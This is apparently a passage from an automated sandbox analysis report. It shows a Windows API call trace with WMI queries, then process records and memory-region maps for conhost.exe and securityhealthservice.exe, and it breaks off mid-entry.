WbemLocator:IUnknown:AddRef (This=0x1ace6bd0) returned 0x2 [0292.938] GetProcessHeap () returned 0x530000 [0292.938] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x16) returned 0x1ace7010 [0292.939] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="root/cimv2") returned 10 [0292.939] _wcsicmp (_String1="root/cimv2", _String2="root/Microsoft/Windows/Defender") returned -10 [0292.939] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0292.939] _vsnwprintf (in: _Buffer=0x1b97fa08, _BufferCount=0x9, _Format="MS_%x", _ArgList=0x1b97f8e8 | out: _Buffer="MS_409") returned 6 [0292.939] SetThreadToken (Thread=0x0, Token=0x7f0) returned 1 [0292.939] GetCurrentThreadId () returned 0xee8 [0292.939] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ace6bd0, strNetworkResource="root/cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1b97f968 | out: ppNamespace=0x1b97f968*=0x1ad7da70) returned 0x0 [0293.010] CoSetProxyBlanket (pProxy=0x1ad7da70, dwAuthnSvc=0xffffffff, dwAuthzSvc=0xffffffff, pServerPrincName=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x40) returned 0x0 [0293.010] GetProcessHeap () returned 0x530000 [0293.010] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x16) returned 0x1ace6c70 [0293.010] GetProcessHeap () returned 0x530000 [0293.010] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x30) returned 0x1ad4f2e0 [0293.010] _wcsicmp (_String1="root/cimv2", _String2="root/Microsoft/Windows/Defender") returned -10 [0293.011] WbemLocator:IUnknown:AddRef (This=0x1ad7da70) returned 0x2 [0293.011] GetProcessHeap () returned 0x530000 [0293.011] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace7010) returned 1 [0293.011] PublishDebugMessage () returned 0x1 [0293.011] WbemLocator:IUnknown:Release (This=0x1ace6bd0) returned 0x1 [0293.011] PublishDebugMessage () returned 0x1 [0293.011] ResultFromHRESULT () returned 0x0 [0293.011] CoUninitialize () [0293.011] GetCurrentThreadId () returned 0xee8 [0293.011] GetProcessHeap () returned 0x530000 [0293.012] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad57330) returned 1 [0293.012] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0293.012] PublishDebugMessage () returned 0x1 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x7 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x6 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x5 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x4 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x3 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x2 [0293.120] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x1 [0293.121] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x0 [0293.121] GetProcessHeap () returned 0x530000 [0293.121] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace7190) returned 1 [0293.121] GetProcessHeap () returned 0x530000 [0293.121] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a80f260) returned 1 Thread: id = 263 os_tid = 0xf6c [0306.731] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7fffbdc42060, phModule=0x1b9ffbe8 | out: phModule=0x1b9ffbe8*=0x7fffbdc30000) returned 1 [0306.731] TpCallbackUnloadDllOnCompletion () returned 0x7fffbdc2ffff [0306.731] PublishDebugMessage () returned 0x1 [0306.732] TpWaitForWork () returned 0x0 [0306.732] GetProcessHeap () returned 0x530000 [0306.732] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ad57210 [0306.732] SetEvent (hEvent=0x7fc) returned 1 [0306.733] TpReleaseWork () returned 0x1 [0306.733] TpReleaseWork () returned 0x2 [0306.733] GetProcessHeap () returned 0x530000 [0306.733] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6e10) returned 1 [0306.733] GetProcessHeap () returned 0x530000 [0306.733] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad7e780) returned 1 [0306.733] GetProcessHeap () returned 0x530000 [0306.733] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6ff0) returned 1 [0306.733] PublishDebugMessage () returned 0x1 [0306.733] PublishDebugMessage () returned 0x1 [0306.733] GetProcessHeap () returned 0x530000 [0306.734] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a819bf0) returned 1 [0306.734] PublishDebugMessage () returned 0x1 Thread: id = 264 os_tid = 0x4f8 [0306.730] PublishDebugMessage () returned 0x1 [0306.730] CreateThreadpoolWork (in: pfnwk=0x7fffbdc42060, pv=0x1a819bf0, pcbe=0x0 | out: pv=0x1a819bf0) returned 0x1a85d270 [0306.730] TpPostWork () returned 0x3 [0306.730] PublishDebugMessage () returned 0x1 [0306.730] PublishDebugMessage () returned 0x1 Thread: id = 268 os_tid = 0x16b4 Thread: id = 269 os_tid = 0x558 Thread: id = 271 os_tid = 0x1444 Thread: id = 272 os_tid = 0x14b8 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x65271000" os_pid = "0x12f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xd0c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001bd08" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2306 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2307 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2308 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2309 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2310 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2311 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 2312 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2313 start_va = 0x7ff722270000 end_va = 0x7ff722344fff monitored = 0 entry_point = 0x7ff72228e520 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2314 start_va = 0x7fffcca30000 end_va = 0x7fffccc23fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2315 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 2316 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 2317 start_va = 0x400000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2318 start_va = 0x7fffcb440000 end_va = 0x7fffcb4fcfff monitored = 0 entry_point = 0x7fffcb457070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2319 start_va = 0x7fffca790000 end_va = 0x7fffcaa56fff monitored = 0 entry_point = 0x7fffca7a1bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2320 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2321 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 2322 start_va = 0xd0000 end_va = 0x198fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2323 start_va = 0x7fffca560000 end_va = 0x7fffca5fcfff monitored = 0 entry_point = 0x7fffca575390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2324 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2325 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2326 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2327 start_va = 0x7fffcad80000 end_va = 0x7fffcae2dfff monitored = 0 entry_point = 0x7fffcadbb940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2328 start_va = 0x7fffcb560000 end_va = 0x7fffcb5fdfff monitored = 0 entry_point = 0x7fffcb567850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2329 start_va = 0x7fffcbb90000 end_va = 0x7fffcbee3fff monitored = 0 entry_point = 0x7fffcbc81d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2330 start_va = 0x7fffcc830000 end_va = 0x7fffcc952fff monitored = 0 entry_point = 0x7fffcc88da30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2331 start_va = 0x7fffcb600000 end_va = 0x7fffcb6a9fff monitored = 0 entry_point = 0x7fffcb615470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2332 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2333 start_va = 0x7fffcb2a0000 end_va = 0x7fffcb33afff monitored = 0 entry_point = 0x7fffcb2bc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2334 start_va = 0x5e0000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2335 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2336 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2337 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2338 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2339 start_va = 0x5e0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2340 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 2341 start_va = 0x7fffcb7a0000 end_va = 0x7fffcb93ffff monitored = 0 entry_point = 0x7fffcb7b7a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2342 start_va = 0x7fffca760000 end_va = 0x7fffca781fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 2343 start_va = 0x7fffcc960000 end_va = 0x7fffcc989fff monitored = 0 entry_point = 0x7fffcc9648d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2344 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 2345 start_va = 0x1e0000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2346 start_va = 0x480000 end_va = 0x4adfff monitored = 0 entry_point = 0x4814d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2347 start_va = 0x740000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2348 start_va = 0x7fffcb940000 end_va = 0x7fffcb96ffff monitored = 0 entry_point = 0x7fffcb9414d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2349 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2350 start_va = 0xad0000 end_va = 0x1ed0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2351 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhost.exe.mui" filename = "\\Windows\\System32\\en-US\\Conhost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\conhost.exe.mui") Region: id = 2354 start_va = 0x7fffcc090000 end_va = 0x7fffcc7c0fff monitored = 0 entry_point = 0x7fffcc19e6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2355 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2356 start_va = 0x480000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2358 start_va = 0x1ee0000 end_va = 0x2217fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2359 start_va = 0x50000 end_va = 0xc0fff monitored = 0 entry_point = 0x53d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2360 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2361 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2362 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2363 start_va = 0x2220000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2364 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2365 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 2366 start_va = 0x660000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2367 start_va = 0x7fffcaa90000 end_va = 0x7fffcaba4fff monitored = 0 entry_point = 0x7fffcaaceb60 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2368 start_va = 0x7fffcb350000 end_va = 0x7fffcb424fff monitored = 0 entry_point = 0x7fffcb36d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2369 start_va = 0x2320000 end_va = 0x2447fff monitored = 0 entry_point = 0x2346140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2370 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2371 start_va = 0x2320000 end_va = 0x2401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 2372 start_va = 0x4b0000 end_va = 0x4b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2373 start_va = 0x2410000 end_va = 0x2804fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 2374 start_va = 0x4c0000 end_va = 0x4c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2375 start_va = 0x6e0000 end_va = 0x6e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 2376 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2377 start_va = 0x2810000 end_va = 0x2d01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002810000" filename = "" Region: id = 2378 start_va = 0x2d10000 end_va = 0x3f6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2379 start_va = 0x7fffc0700000 end_va = 0x7fffc07adfff monitored = 0 entry_point = 0x7fffc074b570 region_type = mapped_file name = "textshaping.dll" filename = "\\Windows\\System32\\TextShaping.dll" (normalized: "c:\\windows\\system32\\textshaping.dll") Region: id = 2380 start_va = 0x700000 end_va = 0x701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2381 start_va = 0x7fffb7b90000 end_va = 0x7fffb7e29fff monitored = 0 entry_point = 0x7fffb7c296c0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll") Region: id = 2382 start_va = 0x710000 end_va = 0x710fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2383 start_va = 0x720000 end_va = 0x721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2384 start_va = 0x7fffc8010000 end_va = 0x7fffc803dfff monitored = 0 entry_point = 0x7fffc80142d0 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Thread: id = 209 os_tid = 0x13ec Thread: id = 210 os_tid = 0x12e0 Thread: id = 211 os_tid = 0xb70 Thread: id = 213 os_tid = 0x1314 Thread: id = 214 os_tid = 0xa94 Process: id = "10" image_name = "securityhealthservice.exe" filename = "c:\\windows\\system32\\securityhealthservice.exe" page_root = "0x4e439000" os_pid = "0x548" os_integrity_level = "0x4000" os_privileges = "0x20900080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\system32\\SecurityHealthService.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-259296475-4084429506-1152984619-38739575-565535606" [0xe], "NT AUTHORITY\\Logon Session 00000000:00104e7b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2561 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2562 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2563 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2564 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2565 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2566 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2567 start_va = 0xf0000 end_va = 0x1b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2568 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2569 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2570 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2571 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2572 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2573 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2574 start_va = 0x480000 end_va = 0x486fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2575 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2576 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2577 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2578 start_va = 0x600000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2579 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2580 start_va = 0x990000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2581 start_va = 0xa60000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2582 start_va = 0xae0000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 2583 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 2584 start_va = 0xbe0000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2585 start_va = 0xc60000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 2586 start_va = 0xce0000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 2587 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2588 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 2589 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 2590 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 2591 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 2592 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2593 start_va = 0x7ff6cbd10000 end_va = 0x7ff6cbdfdfff monitored = 0 entry_point = 0x7ff6cbdb8ec0 region_type = mapped_file name = "securityhealthservice.exe" filename = "\\Windows\\System32\\SecurityHealthService.exe" (normalized: "c:\\windows\\system32\\securityhealthservice.exe") Region: id = 2594 start_va = 0x7fffa3f90000 end_va = 0x7fffa4078fff monitored = 0 entry_point = 0x7fffa401be70 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 2595 start_va = 0x7fffae280000 end_va = 0x7fffae29dfff monitored = 0 entry_point = 0x7fffae281fa0 region_type = mapped_file name = "securityhealthproxystub.dll" filename = "\\Windows\\System32\\SecurityHealthProxyStub.dll" (normalized: "c:\\windows\\system32\\securityhealthproxystub.dll") Region: id = 2596 start_va = 0x7fffb4400000 end_va = 0x7fffb4409fff monitored = 0 entry_point = 0x7fffb4401390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2597 start_va = 0x7fffb4ef0000 end_va = 0x7fffb502bfff monitored = 0 entry_point = 0x7fffb4efadf0 region_type = mapped_file name = "drvstore.dll" filename = "\\Windows\\System32\\drvstore.dll" (normalized: 